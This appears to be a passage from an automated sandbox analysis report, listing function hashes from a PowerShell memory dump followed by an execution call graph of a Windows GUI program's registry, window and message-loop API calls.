                            • Opcode ID: 3d55c4a38d201904f290acbb4f1105cc3598a1fe39de64b8f3c846d5d5fe4f95
                            • Instruction ID: 0522af1edc311940c9240eadc2d23b1b5d1b98c66525a9affb1315b05803a6e2
                            • Opcode Fuzzy Hash: 3d55c4a38d201904f290acbb4f1105cc3598a1fe39de64b8f3c846d5d5fe4f95
                            • Instruction Fuzzy Hash: 29213B75A002099FCB04DF59C8909AAFBB1FF89310B158995E819EB351C735FC41DBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04873B2A Relevance: .1, Instructions: 63COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.1410052268.0000000004870000.00000040.00000800.00020000.00000000.sdmp, Offset: 04870000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_4870000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 93a9227e0ab7c035f72153935ac29f854c7b70a29017bbb503b5a283302a1e53
                            • Instruction ID: 3b7e12920d4d0868f775e87444745a02d7514134a4ce7e640c09b6f379a3c70e
                            • Opcode Fuzzy Hash: 93a9227e0ab7c035f72153935ac29f854c7b70a29017bbb503b5a283302a1e53
                            • Instruction Fuzzy Hash: 1A212C75A002098FCB04CF58C494AA9FBB1FF88310B158999D956EB361C735FC41DB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04874770 Relevance: .1, Instructions: 63COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.1410052268.0000000004870000.00000040.00000800.00020000.00000000.sdmp, Offset: 04870000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_4870000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 02b5b65fbc522003823e0a8e98e1532560e2f75b49e97a565223fc78678de4eb
                            • Instruction ID: 68b7226f8f113a61d6027a1729c0895152abce4603e2a1bcfcf6d4cf0c1d6640
                            • Opcode Fuzzy Hash: 02b5b65fbc522003823e0a8e98e1532560e2f75b49e97a565223fc78678de4eb
                            • Instruction Fuzzy Hash: 3C21E474A006199FCB04CF89C8909AAF7B1FF89310B258669E909E7751C735FC51CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04875400 Relevance: .0, Instructions: 49COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.1410052268.0000000004870000.00000040.00000800.00020000.00000000.sdmp, Offset: 04870000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_4870000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f3d1b88c7b3bace396a6bde9f49568166e0f57a48fe01ed4a12ce2e77a9fe9bf
                            • Instruction ID: 0879c824f2da459f3abe26816f45380c0818720b5a27eccc8d008441fe0d2368
                            • Opcode Fuzzy Hash: f3d1b88c7b3bace396a6bde9f49568166e0f57a48fe01ed4a12ce2e77a9fe9bf
                            • Instruction Fuzzy Hash: 6211DA34A00219EFDB05CFA8D494E9DBBB2FF89314F288558E404AB761C775E982CF50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:4.9%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:0.5%
                            Total number of Nodes:2000
                            Total number of Limit Nodes:54
                            execution_graph 56267 44421e #17 56429 43ceae CreateDialogParamA ShowWindow SetActiveWindow KiUserCallbackDispatcher 56267->56429 56269 444229 56430 446489 56269->56430 56271 44422e 56272 444232 56271->56272 56273 444253 56271->56273 56451 40b852 56272->56451 56275 444268 RegisterClipboardFormatA 56273->56275 56276 444278 56273->56276 56275->56276 56433 445b09 GetModuleFileNameA 56276->56433 56277 444242 MessageBoxA 56281 4442e8 56277->56281 56280 44427d 56282 44428c GetProcAddress 56280->56282 56283 44429f 56280->56283 56282->56283 56284 4442aa CoInitialize 56283->56284 56285 4442ba 56284->56285 56288 4442f5 56284->56288 56286 4442bf 56285->56286 56285->56288 56287 40b852 35 API calls 56286->56287 56287->56277 56289 40248b 38 API calls 56288->56289 56290 44432c 56289->56290 56454 410eae 56290->56454 56292 444372 56293 4444ab 56292->56293 56314 44437c _strlen 56292->56314 56294 444510 56293->56294 56295 4444af 56293->56295 56503 44b11f 41 API calls 2 library calls 56294->56503 56498 44e48e 56295->56498 56299 444338 56299->56292 56468 44d22d 37 API calls ___initmbctable 56299->56468 56301 4443df 56313 4443e3 56301->56313 56495 401dd7 89 API calls 56301->56495 56302 4444cf MapViewOfFile 56303 4443d3 56302->56303 56307 4444e9 56302->56307 56303->56301 56471 43cee1 56303->56471 56304 4443b8 56308 410eae 75 API calls 56304->56308 56502 40295f 38 API calls 56307->56502 56311 4443c8 56308->56311 56470 40b47d 38 API calls 56311->56470 56544 4407de 65 API calls 56313->56544 56314->56304 56469 44d22d 37 API calls ___initmbctable 56314->56469 56315 4444f8 UnmapViewOfFile CloseHandle 56315->56301 56316 4010f6 89 API calls 56355 44451f _wctomb_s 56316->56355 56318 444420 56320 43cee1 65 API calls 56318->56320 56323 44442a 56318->56323 56319 4443fb 56319->56318 56496 40b47d 38 API calls 56319->56496 56320->56323 56323->56313 56497 40213a 38 API calls _wctomb_s 56323->56497 56326 444730 _wctomb_s 56327 444747 56326->56327 56328 44475e 56326->56328 56329 40b852 35 API calls 56327->56329 56330 40b852 35 API calls 56328->56330 56331 444751 56329->56331 56330->56331 56334 40b852 35 API calls 56331->56334 56332 44443a _strspn _strrchr 56336 44447a 56332->56336 56338 402564 38 API calls 56332->56338 56333 444727 56507 44b0ba MessageBoxIndirectA 56333->56507 56337 44477a 56334->56337 56341 402564 38 API calls 56336->56341 56508 44b05d MessageBoxIndirectA 56337->56508 56338->56336 56344 4447d1 56341->56344 56342 44478d 56345 444795 56342->56345 56350 44472c 56342->56350 56343 4445f7 56343->56355 56504 44c558 38 API calls 6 library calls 56343->56504 56348 4447e1 LoadIconA LoadCursorA RegisterClassA 56344->56348 56349 44482d ___initmbctable 56344->56349 56509 44a3e8 69 API calls 56345->56509 56348->56349 56511 43e6a4 38 API calls 56349->56511 56510 44ef2f 5 API calls _wctomb_s 56350->56510 56353 40248b 38 API calls 56353->56355 56354 444843 56512 440832 38 API calls 56354->56512 56355->56301 56355->56316 56355->56326 56355->56333 56355->56343 56355->56353 56358 402564 38 API calls 56355->56358 56505 44d22d 37 API calls ___initmbctable 56355->56505 56506 43daf0 36 API calls 56355->56506 56357 444848 56359 402036 38 API calls 56357->56359 56358->56355 56360 44487d 56359->56360 56361 402036 38 API calls 56360->56361 56362 444899 56361->56362 56513 4405db 18 API calls 56362->56513 56364 4448b2 56365 402036 38 API calls 56364->56365 56366 4448e6 56365->56366 56367 402036 38 API calls 56366->56367 56368 444900 56367->56368 56369 402036 38 API calls 56368->56369 56370 444918 56369->56370 56371 402036 38 API calls 56370->56371 56372 444932 CreateWindowExA 56371->56372 56514 43df14 104 API calls ___initmbctable 56372->56514 56375 44496c 56515 433b95 121 API calls _strcat 56375->56515 56377 444979 56516 408ce2 38 API calls 56377->56516 56379 44498a 56380 402036 38 API calls 56379->56380 56381 4449a8 56380->56381 56382 402036 38 API calls 56381->56382 56383 4449b9 56382->56383 56384 402036 38 API calls 56383->56384 56385 4449c9 56384->56385 56386 4449d7 GetWindowRect GetClientRect 56385->56386 56387 402036 38 API calls 56386->56387 56388 444a07 SetWindowPos 56387->56388 56389 444a95 ___initmbctable 56388->56389 56390 444a9f CreateBitmap 56389->56390 56517 40b470 56390->56517 56394 444b7e 56532 43d7ca DeleteMenu AppendMenuA AppendMenuA 56394->56532 56396 444b8d 12 API calls 56397 402036 38 API calls 56396->56397 56398 444c3e AppendMenuA AppendMenuA 56397->56398 56399 444c59 56398->56399 56400 444c5d AppendMenuA 56399->56400 56401 40b852 35 API calls 56399->56401 56400->56399 56402 444c7d AppendMenuA 56401->56402 56403 444b85 56402->56403 56403->56396 56404 444ca5 56403->56404 56533 44122e 72 API calls 56404->56533 56406 444caa GetKeyboardLayout 56534 43e4f6 GetLocaleInfoA 56406->56534 56408 444cb7 ShowWindow SetForegroundWindow 56535 43dbce 46 API calls 56408->56535 56410 444ce4 GetForegroundWindow 56536 432e3c 6 API calls 56410->56536 56412 444d01 UpdateWindow 56413 444d15 56412->56413 56537 4458eb 13 API calls _wctomb_s 56413->56537 56542 43db3e 189 API calls 56413->56542 56543 4480b2 43 API calls _wctomb_s 56413->56543 56415 444d1e MsgWaitForMultipleObjects 56424 444d38 56415->56424 56417 444da3 PeekMessageA 56418 444db2 GetForegroundWindow 56417->56418 56417->56424 56541 432e3c 6 API calls 56418->56541 56420 444d5c IsWindow 56422 444d80 DispatchMessageA 56420->56422 56423 444d6c IsDialogMessageA 56420->56423 56421 444de8 56421->56313 56422->56424 56423->56422 56423->56424 56424->56417 56424->56420 56424->56421 56538 4459e5 44 API calls _wctomb_s 56424->56538 56539 4324e5 188 API calls 56424->56539 56540 44071c 51 API calls 56424->56540 56429->56269 56545 44ce90 56430->56545 56434 445b39 _strcat _strrchr 56433->56434 56547 44c383 56434->56547 56436 445b80 56438 445ba0 _strcat 56436->56438 56550 44c2e9 26 API calls _wctomb_s 56436->56550 56439 44c383 41 API calls 56438->56439 56440 445bc3 56439->56440 56442 445bdc _strcat 56440->56442 56551 44c2e9 26 API calls _wctomb_s 56440->56551 56443 44c383 41 API calls 56442->56443 56444 445bfd 56443->56444 56447 445c1d 56444->56447 56552 44c2e9 26 API calls _wctomb_s 56444->56552 56445 445c6a 56445->56280 56447->56445 56448 445c40 GetProcAddress 56447->56448 56449 445c4e 56447->56449 56448->56449 56449->56445 56450 445c63 FreeLibrary 56449->56450 56450->56445 56600 40b6cc 56451->56600 56455 410e76 56454->56455 56611 44974c 56455->56611 56457 410e80 56618 40fdb2 56457->56618 56461 410e92 57029 40b47d 38 API calls 56461->57029 56463 410e9b 56464 410ea3 56463->56464 56465 410ead 56463->56465 57030 446304 12 API calls 56464->57030 56465->56299 56467 410eac 56467->56465 56468->56299 56469->56314 56470->56303 56472 43ceea 56471->56472 57163 4045c1 56472->57163 56474 43cefa 57757 438707 56474->57757 56476 43cf16 57873 43b8d0 56476->57873 56479 43b8d0 38 API calls 56480 43cf40 56479->56480 56481 40b852 35 API calls 56480->56481 56482 43cf50 56481->56482 56483 40b852 35 API calls 56482->56483 56484 43cf65 56483->56484 57878 43b78d 56484->57878 56495->56319 56496->56318 56497->56332 56499 44e4aa _strlen 56498->56499 58022 452678 56499->58022 56501 4444c3 56501->56302 56501->56303 56502->56315 56503->56355 56504->56343 56505->56355 56507->56350 56508->56342 56509->56350 56510->56336 56511->56354 56512->56357 56513->56364 56514->56375 56515->56377 56516->56379 56518 40b477 7 API calls 56517->56518 56519 410ce3 56518->56519 56520 410cfc 56519->56520 56531 410d93 _wctomb_s 56519->56531 58043 449a85 RegOpenKeyA 56520->58043 56522 410d07 56523 410d83 56522->56523 56529 410d0e _strcat _strlen 56522->56529 56525 40b40a 13 API calls 56523->56525 56525->56531 56526 410d7a 58046 449b11 RegCloseKey 56526->58046 56528 410d82 56528->56523 56529->56526 56530 40b40a 13 API calls 56529->56530 58045 449abf RegEnumKeyA 56529->58045 56530->56529 56531->56394 56532->56403 56532->56532 56533->56406 56534->56408 56535->56410 56536->56412 56537->56415 56538->56424 56539->56424 56540->56417 56541->56413 56542->56413 56543->56413 56546 44649c GetVersionExA 56545->56546 56546->56271 56553 44c359 56547->56553 56549 44c392 56549->56436 56550->56438 56551->56442 56552->56447 56559 44f625 56553->56559 56556 44c362 56556->56549 56560 44f638 56559->56560 56562 44c35e 56559->56562 56561 44e235 __getbuf 6 API calls 56560->56561 56560->56562 56561->56562 56562->56556 56563 44f4bd 56562->56563 56566 44f4dc 56563->56566 56564 44c37f 56564->56549 56566->56564 56567 454336 56566->56567 56568 454351 56567->56568 56578 4543c0 _write_multi_char 56568->56578 56590 45416c 56568->56590 56571 4544ef CreateFileA 56572 454520 GetLastError 56571->56572 56573 45450e GetFileType 56571->56573 56572->56578 56574 45452f 56573->56574 56575 454519 CloseHandle 56573->56575 56594 454209 SetStdHandle 56574->56594 56575->56572 56577 45454a 56577->56578 56579 45457e 56577->56579 56578->56564 56595 4553c1 SetFilePointer GetLastError _write_multi_char 56579->56595 56581 454588 56582 454593 56581->56582 56596 45368f 6 API calls _write_multi_char 56581->56596 56582->56578 56599 44f301 CloseHandle GetLastError SetStdHandle _write_multi_char 56582->56599 56585 4545cb 56587 4545e1 56585->56587 56597 456543 23 API calls 3 library calls 56585->56597 56586 454600 56587->56582 56598 4553c1 SetFilePointer GetLastError _write_multi_char 56587->56598 56591 454181 56590->56591 56592 44e235 __getbuf 6 API calls 56591->56592 56593 4541c2 56591->56593 56592->56593 56593->56571 56593->56578 56594->56577 56595->56581 56596->56585 56597->56587 56598->56582 56599->56586 56601 40b6dc 56600->56601 56603 40b715 56601->56603 56604 40b40a 13 API calls 56601->56604 56605 44e3e1 56601->56605 56603->56277 56604->56601 56606 44fe3f _wctomb_s 32 API calls 56605->56606 56607 44e40e 56606->56607 56609 44e41c 56607->56609 56610 44fc9b 27 API calls 2 library calls 56607->56610 56609->56601 56610->56609 56612 449759 _strlen 56611->56612 56613 449783 RegOpenKeyA 56612->56613 56614 4497a3 RegOpenKeyA 56613->56614 56617 44979d 56613->56617 56615 4497b5 RegCloseKey 56614->56615 56616 4497b1 56614->56616 56615->56617 56616->56615 56617->56457 56619 40248b 38 API calls 56618->56619 56620 40fdc8 56619->56620 56621 402564 38 API calls 56620->56621 56622 40fdd6 56621->56622 56623 402564 38 API calls 56622->56623 56624 40fddf 56623->56624 56625 402564 38 API calls 56624->56625 56626 40fde8 56625->56626 57031 40e7e9 56626->57031 56628 40fdfa 57036 40e84f 56628->57036 56630 40fe0b 57041 40e8a8 56630->57041 56633 40e8a8 39 API calls 56634 40fe2a 56633->56634 56635 40e8a8 39 API calls 56634->56635 56636 40fe3a 56635->56636 56637 40e8a8 39 API calls 56636->56637 56638 40fe4d 56637->56638 56639 40e8a8 39 API calls 56638->56639 56640 40fe5c 56639->56640 57046 40e7b4 56640->57046 56642 40fe6c 56643 40248b 38 API calls 56642->56643 56644 40fe7e 56643->56644 56645 40248b 38 API calls 56644->56645 56647 40fe8f 56645->56647 56646 40febe 56651 40e8a8 39 API calls 56646->56651 56647->56646 56648 40248b 38 API calls 56647->56648 56649 40feaa 56648->56649 56650 40e8a8 39 API calls 56649->56650 56650->56646 56652 40fed9 56651->56652 57049 40e889 56652->57049 56655 40248b 38 API calls 56656 40fef6 56655->56656 56657 40e8a8 39 API calls 56656->56657 56658 40ff06 56657->56658 56659 40e889 RegQueryValueExA 56658->56659 56660 40ff15 56659->56660 56661 40e889 RegQueryValueExA 56660->56661 56662 40ff25 56661->56662 56663 40248b 38 API calls 56662->56663 56664 40ff37 56663->56664 56665 40e8a8 39 API calls 56664->56665 56666 40ff47 56665->56666 56667 40e8a8 39 API calls 56666->56667 56668 40ff56 56667->56668 56669 40e7e9 40 API calls 56668->56669 56670 40ff6c 56669->56670 56671 40e7e9 40 API calls 56670->56671 56672 40ff7f 56671->56672 57053 40e8ca 56672->57053 56674 40ffc5 56675 40e7e9 40 API calls 56674->56675 56677 40ffd4 56675->56677 56676 40ff8d 56676->56674 57078 4025d3 56676->57078 56679 40e889 RegQueryValueExA 56677->56679 56680 40ffe1 56679->56680 56681 40248b 38 API calls 56680->56681 56682 40fff1 56681->56682 56683 40e8a8 39 API calls 56682->56683 56684 410000 56683->56684 56685 40e8a8 39 API calls 56684->56685 56686 410013 56685->56686 56687 402036 38 API calls 56686->56687 56688 41001b 56687->56688 56689 410073 56688->56689 56690 40e889 RegQueryValueExA 56688->56690 56691 40e7e9 40 API calls 56689->56691 56697 41002f 56690->56697 56692 410089 56691->56692 56693 40e8a8 39 API calls 56692->56693 56694 410099 56693->56694 56696 40e7e9 40 API calls 56694->56696 56695 40248b 38 API calls 56695->56689 56698 4100a8 56696->56698 56699 40e889 RegQueryValueExA 56697->56699 56701 410036 56697->56701 56700 40e7e9 40 API calls 56698->56700 56699->56701 56702 4100b7 56700->56702 56701->56695 56703 40e7e9 40 API calls 56702->56703 56704 4100cd 56703->56704 56705 40e8ca 40 API calls 56704->56705 56706 4100db 56705->56706 56707 40e7e9 40 API calls 56706->56707 56708 4100ea 56707->56708 56709 40e8a8 39 API calls 56708->56709 56710 4100f9 56709->56710 56711 40e7e9 40 API calls 56710->56711 56712 41010b 56711->56712 56713 40e8a8 39 API calls 56712->56713 56714 41011a 56713->56714 56715 40e8a8 39 API calls 56714->56715 56716 410129 56715->56716 56717 40e8a8 39 API calls 56716->56717 56718 410139 56717->56718 56719 40e8a8 39 API calls 56718->56719 56720 41014b 56719->56720 56721 40e8a8 39 API calls 56720->56721 56722 41015a 56721->56722 56723 40e8a8 39 API calls 56722->56723 56724 410169 56723->56724 57063 40eb57 56724->57063 56727 40e889 RegQueryValueExA 56728 410192 56727->56728 56729 40eb57 40 API calls 56728->56729 56730 4101bc 56729->56730 56731 40e8a8 39 API calls 56730->56731 56732 4101cc 56731->56732 56733 40e7e9 40 API calls 56732->56733 56734 4101df 56733->56734 56735 40e8a8 39 API calls 56734->56735 56736 4101f2 56735->56736 56737 40e7e9 40 API calls 56736->56737 56738 410201 56737->56738 56739 40e8a8 39 API calls 56738->56739 56740 410210 56739->56740 56741 40e8a8 39 API calls 56740->56741 56742 41021f 56741->56742 56743 40e8a8 39 API calls 56742->56743 56744 410232 56743->56744 56745 40e8a8 39 API calls 56744->56745 56746 410241 56745->56746 56747 40e8a8 39 API calls 56746->56747 56748 410251 56747->56748 56749 40e8a8 39 API calls 56748->56749 56750 410261 56749->56750 56751 40eb57 40 API calls 56750->56751 56752 410282 56751->56752 56753 40e84f 40 API calls 56752->56753 56754 410290 56753->56754 56755 40e8a8 39 API calls 56754->56755 56756 41029f 56755->56756 56757 40e84f 40 API calls 56756->56757 56758 4102b0 56757->56758 56759 40e7e9 40 API calls 56758->56759 56760 4102bf 56759->56760 56761 40e8a8 39 API calls 56760->56761 56762 4102ce 56761->56762 56763 40e8a8 39 API calls 56762->56763 56764 4102dd 56763->56764 56765 40e8a8 39 API calls 56764->56765 56766 4102f0 56765->56766 56767 40e8a8 39 API calls 56766->56767 56768 4102ff 56767->56768 56769 40e8a8 39 API calls 56768->56769 56770 41030e 56769->56770 56771 40e8a8 39 API calls 56770->56771 56772 41031d 56771->56772 56773 40e8a8 39 API calls 56772->56773 56774 41032f 56773->56774 56775 40e8a8 39 API calls 56774->56775 56776 41033e 56775->56776 56777 40e8a8 39 API calls 56776->56777 56778 41034d 56777->56778 56779 40e8a8 39 API calls 56778->56779 56780 41035c 56779->56780 56781 40e8a8 39 API calls 56780->56781 56782 41036e 56781->56782 56783 40e889 RegQueryValueExA 56782->56783 56784 41037b 56783->56784 56785 40e8a8 39 API calls 56784->56785 56786 410392 56785->56786 56787 40e8a8 39 API calls 56786->56787 56788 4103a1 56787->56788 56789 40e8a8 39 API calls 56788->56789 56790 4103b3 56789->56790 56791 40e8a8 39 API calls 56790->56791 56792 4103c2 56791->56792 56793 40e8a8 39 API calls 56792->56793 56794 4103d1 56793->56794 56795 40e8a8 39 API calls 56794->56795 56796 4103e0 56795->56796 56797 40e8a8 39 API calls 56796->56797 56798 4103f3 56797->56798 56799 40e8a8 39 API calls 56798->56799 56800 410402 56799->56800 56801 40e8a8 39 API calls 56800->56801 56802 410411 56801->56802 56803 40e8a8 39 API calls 56802->56803 56804 410420 56803->56804 56805 40e8a8 39 API calls 56804->56805 56806 410433 56805->56806 56807 40e8a8 39 API calls 56806->56807 56808 410442 56807->56808 56809 40e8a8 39 API calls 56808->56809 56810 410452 56809->56810 56811 40e8a8 39 API calls 56810->56811 56812 410462 56811->56812 56813 40e8a8 39 API calls 56812->56813 56814 410475 56813->56814 56815 40e7e9 40 API calls 56814->56815 56816 410488 56815->56816 56817 40e8a8 39 API calls 56816->56817 56818 410497 56817->56818 56819 40e8a8 39 API calls 56818->56819 56820 4104a6 56819->56820 56821 40e8a8 39 API calls 56820->56821 56822 4104b8 56821->56822 56823 40e8a8 39 API calls 56822->56823 56824 4104c7 56823->56824 56825 40e8a8 39 API calls 56824->56825 56826 4104d7 56825->56826 56827 40e8a8 39 API calls 56826->56827 56828 4104e6 56827->56828 56829 40e8a8 39 API calls 56828->56829 56830 4104f8 56829->56830 56831 40e8a8 39 API calls 56830->56831 56832 410508 56831->56832 56833 40e8a8 39 API calls 56832->56833 56834 410517 56833->56834 56835 40e84f 40 API calls 56834->56835 56836 410525 56835->56836 56837 40e8a8 39 API calls 56836->56837 56838 410538 56837->56838 56839 40e8a8 39 API calls 56838->56839 56840 410548 56839->56840 56841 40e889 RegQueryValueExA 56840->56841 56842 410558 56841->56842 56843 40248b 38 API calls 56842->56843 56844 410561 56843->56844 56845 40e889 RegQueryValueExA 56844->56845 56846 410574 56845->56846 56847 40248b 38 API calls 56846->56847 56848 41057d 56847->56848 56849 40e8a8 39 API calls 56848->56849 56850 410590 56849->56850 56851 40e8a8 39 API calls 56850->56851 56852 41059f 56851->56852 56853 40e8a8 39 API calls 56852->56853 56854 4105b2 56853->56854 56855 40e8a8 39 API calls 56854->56855 56856 4105c1 56855->56856 56857 40e8a8 39 API calls 56856->56857 56858 4105d3 56857->56858 56859 40e8a8 39 API calls 56858->56859 56860 4105e2 56859->56860 56861 40e8a8 39 API calls 56860->56861 56862 4105f4 56861->56862 56863 40e8a8 39 API calls 56862->56863 56864 410604 56863->56864 56865 40e7e9 40 API calls 56864->56865 56866 410613 56865->56866 56867 40e8a8 39 API calls 56866->56867 56868 410623 56867->56868 56869 40e8a8 39 API calls 56868->56869 56870 410636 56869->56870 57073 40e815 56870->57073 56872 410644 56873 40e8a8 39 API calls 56872->56873 56874 410653 56873->56874 56875 40e8a8 39 API calls 56874->56875 56876 410666 56875->56876 56877 40e8a8 39 API calls 56876->56877 56878 41067b 56877->56878 56879 40e8a8 39 API calls 56878->56879 56880 41068d 56879->56880 56881 40e8a8 39 API calls 56880->56881 56882 41069d 56881->56882 56883 40e8a8 39 API calls 56882->56883 56884 4106b0 56883->56884 56885 40e889 RegQueryValueExA 56884->56885 56886 4106bf 56885->56886 56887 40248b 38 API calls 56886->56887 56891 4106cc 56887->56891 56888 44cd68 32 API calls 56888->56891 56889 40e7b4 2 API calls 56889->56891 56890 44e48e 46 API calls 56890->56891 56891->56888 56891->56889 56891->56890 56892 4024f4 38 API calls 56891->56892 56893 41078a 56891->56893 56892->56891 56894 40e8a8 39 API calls 56893->56894 56895 41079c 56894->56895 56896 40e8a8 39 API calls 56895->56896 56897 4107ae 56896->56897 56898 40e8a8 39 API calls 56897->56898 56899 4107c0 56898->56899 56900 40e8a8 39 API calls 56899->56900 56901 4107d2 56900->56901 56902 40e8a8 39 API calls 56901->56902 56909 4107e8 56902->56909 56903 44cd68 32 API calls 56903->56909 56904 40e7b4 2 API calls 56904->56909 56905 4108a4 56906 40e7e9 40 API calls 56905->56906 56907 4108b6 56906->56907 56908 40e8a8 39 API calls 56907->56908 56910 4108c8 56908->56910 56909->56903 56909->56904 56909->56905 57089 4024f4 56909->57089 56912 40e8a8 39 API calls 56910->56912 56913 4108db 56912->56913 56914 40e7e9 40 API calls 56913->56914 56915 4108ea 56914->56915 56916 40e8a8 39 API calls 56915->56916 56917 4108ff 56916->56917 56918 40e8a8 39 API calls 56917->56918 56919 41090f 56918->56919 56920 40e8a8 39 API calls 56919->56920 56921 41091e 56920->56921 56922 40e8a8 39 API calls 56921->56922 56923 41092d 56922->56923 56924 40e8a8 39 API calls 56923->56924 56925 410940 56924->56925 56926 40e8a8 39 API calls 56925->56926 56927 410950 56926->56927 56928 40e8a8 39 API calls 56927->56928 56929 41095f 56928->56929 56930 40e8a8 39 API calls 56929->56930 56931 41096f 56930->56931 56932 40e8a8 39 API calls 56931->56932 56933 410981 56932->56933 56934 40e8a8 39 API calls 56933->56934 56935 410993 56934->56935 56936 40e7e9 40 API calls 56935->56936 56937 4109a5 56936->56937 56938 40e8a8 39 API calls 56937->56938 56939 4109b8 56938->56939 56940 40e84f 40 API calls 56939->56940 56941 4109cc 56940->56941 56942 40e8a8 39 API calls 56941->56942 56943 4109de 56942->56943 56944 40e8a8 39 API calls 56943->56944 56945 4109f0 56944->56945 56946 40e8ca 40 API calls 56945->56946 56947 410a01 56946->56947 56948 40e889 RegQueryValueExA 56947->56948 56949 410a10 56948->56949 56950 40248b 38 API calls 56949->56950 56951 410a21 56950->56951 56952 40e889 RegQueryValueExA 56951->56952 56953 410a2d 56952->56953 56954 40248b 38 API calls 56953->56954 56955 410a3e 56954->56955 56956 40e889 RegQueryValueExA 56955->56956 56957 410a4a 56956->56957 56958 40248b 38 API calls 56957->56958 56959 410a5b 56958->56959 56960 40e889 RegQueryValueExA 56959->56960 56961 410a6a 56960->56961 56962 40248b 38 API calls 56961->56962 56963 410a7b 56962->56963 56964 40e889 RegQueryValueExA 56963->56964 56965 410a87 56964->56965 56966 40248b 38 API calls 56965->56966 56967 410a9c 56966->56967 56968 410ac6 56967->56968 56970 40e889 RegQueryValueExA 56967->56970 56969 40e889 RegQueryValueExA 56968->56969 56971 410ad5 56969->56971 56972 410ab2 56970->56972 56973 40248b 38 API calls 56971->56973 56972->56968 56975 40248b 38 API calls 56972->56975 56974 410ae6 56973->56974 56976 40e889 RegQueryValueExA 56974->56976 56975->56968 56977 410af2 56976->56977 56978 40248b 38 API calls 56977->56978 56979 410b03 56978->56979 56980 40e889 RegQueryValueExA 56979->56980 56981 410b0f 56980->56981 56982 40248b 38 API calls 56981->56982 56983 410b20 56982->56983 56984 40e889 RegQueryValueExA 56983->56984 56985 410b2f 56984->56985 56986 40248b 38 API calls 56985->56986 56987 410b40 56986->56987 56988 40e889 RegQueryValueExA 56987->56988 56989 410b4c 56988->56989 56990 40248b 38 API calls 56989->56990 56991 410b5d 56990->56991 56992 40e889 RegQueryValueExA 56991->56992 56993 410b69 56992->56993 56994 40248b 38 API calls 56993->56994 56995 410b7a 56994->56995 56996 40248b 38 API calls 56995->56996 56997 410b89 56996->56997 56998 40e8a8 39 API calls 56997->56998 56999 410b9c 56998->56999 57000 40e8a8 39 API calls 56999->57000 57001 410baf 57000->57001 57002 40e8a8 39 API calls 57001->57002 57003 410bc1 57002->57003 57004 40e8a8 39 API calls 57003->57004 57005 410bd6 57004->57005 57006 40e815 41 API calls 57005->57006 57007 410be7 57006->57007 57008 40e815 41 API calls 57007->57008 57009 410bf8 57008->57009 57010 40e815 41 API calls 57009->57010 57011 410c09 57010->57011 57012 40e8a8 39 API calls 57011->57012 57013 410c1f 57012->57013 57014 40e7e9 40 API calls 57013->57014 57015 410c2e 57014->57015 57016 40e8a8 39 API calls 57015->57016 57017 410c41 57016->57017 57018 40e8a8 39 API calls 57017->57018 57019 410c51 57018->57019 57020 40e8a8 39 API calls 57019->57020 57021 410c64 57020->57021 57022 40e8a8 39 API calls 57021->57022 57023 410c73 57022->57023 57024 40e8a8 39 API calls 57023->57024 57025 410c83 57024->57025 57026 40e7e9 40 API calls 57025->57026 57027 410c95 57026->57027 57028 449741 RegCloseKey 57027->57028 57028->56461 57029->56463 57030->56467 57032 40e7b4 2 API calls 57031->57032 57033 40e7fb 57032->57033 57034 402564 38 API calls 57033->57034 57035 40e809 57034->57035 57035->56628 57100 4499d8 57036->57100 57038 40e85e 57103 4026cd 57038->57103 57040 40e87d 57040->56630 57042 40e889 RegQueryValueExA 57041->57042 57043 40e8b9 57042->57043 57044 40248b 38 API calls 57043->57044 57045 40e8c5 57044->57045 57045->56633 57047 4497cc 2 API calls 57046->57047 57048 40e7c2 57047->57048 57048->56642 57050 40e896 57049->57050 57121 44983f 57050->57121 57124 4022f4 57053->57124 57055 40e901 57056 40e7b4 2 API calls 57055->57056 57061 40e90d 57056->57061 57058 40e8dd 57058->57055 57059 4022f4 38 API calls 57058->57059 57134 40264f 38 API calls _wctomb_s 57058->57134 57059->57058 57060 40e916 57060->56676 57061->57060 57062 4025d3 38 API calls 57061->57062 57062->57061 57064 40e7b4 2 API calls 57063->57064 57066 40eb72 _wctomb_s 57064->57066 57065 40ec0e 57067 40ed1f 57065->57067 57070 40ec3a 57065->57070 57071 4020b5 38 API calls 57065->57071 57072 4024f4 38 API calls 57065->57072 57066->57065 57069 4024f4 38 API calls 57066->57069 57067->56727 57068 44c558 38 API calls _wctomb_s 57068->57070 57069->57066 57070->57065 57070->57068 57071->57065 57072->57065 57137 449883 57073->57137 57075 40e824 57146 40273c 57075->57146 57077 40e843 57077->56872 57079 4025df 57078->57079 57080 4025f6 57079->57080 57081 402609 57079->57081 57159 44c558 38 API calls 6 library calls 57080->57159 57083 402606 57081->57083 57086 402626 57081->57086 57083->57081 57160 44c558 38 API calls 6 library calls 57083->57160 57085 402623 57085->57086 57087 401f16 38 API calls 57086->57087 57088 40264b 57087->57088 57088->56676 57090 402500 57089->57090 57091 402517 57090->57091 57092 40252a 57090->57092 57161 44c558 38 API calls 6 library calls 57091->57161 57094 402527 57092->57094 57095 402547 57092->57095 57094->57092 57162 44c558 38 API calls 6 library calls 57094->57162 57097 401f16 38 API calls 57095->57097 57099 402560 57097->57099 57098 402544 57098->57095 57099->56909 57114 4497cc 57100->57114 57102 4499e6 57102->57038 57104 4026d9 57103->57104 57105 4026f0 57104->57105 57106 402703 57104->57106 57119 44c558 38 API calls 6 library calls 57105->57119 57108 402720 57106->57108 57109 402700 57106->57109 57112 401f16 38 API calls 57108->57112 57109->57106 57120 44c558 38 API calls 6 library calls 57109->57120 57111 40271d 57111->57108 57113 402738 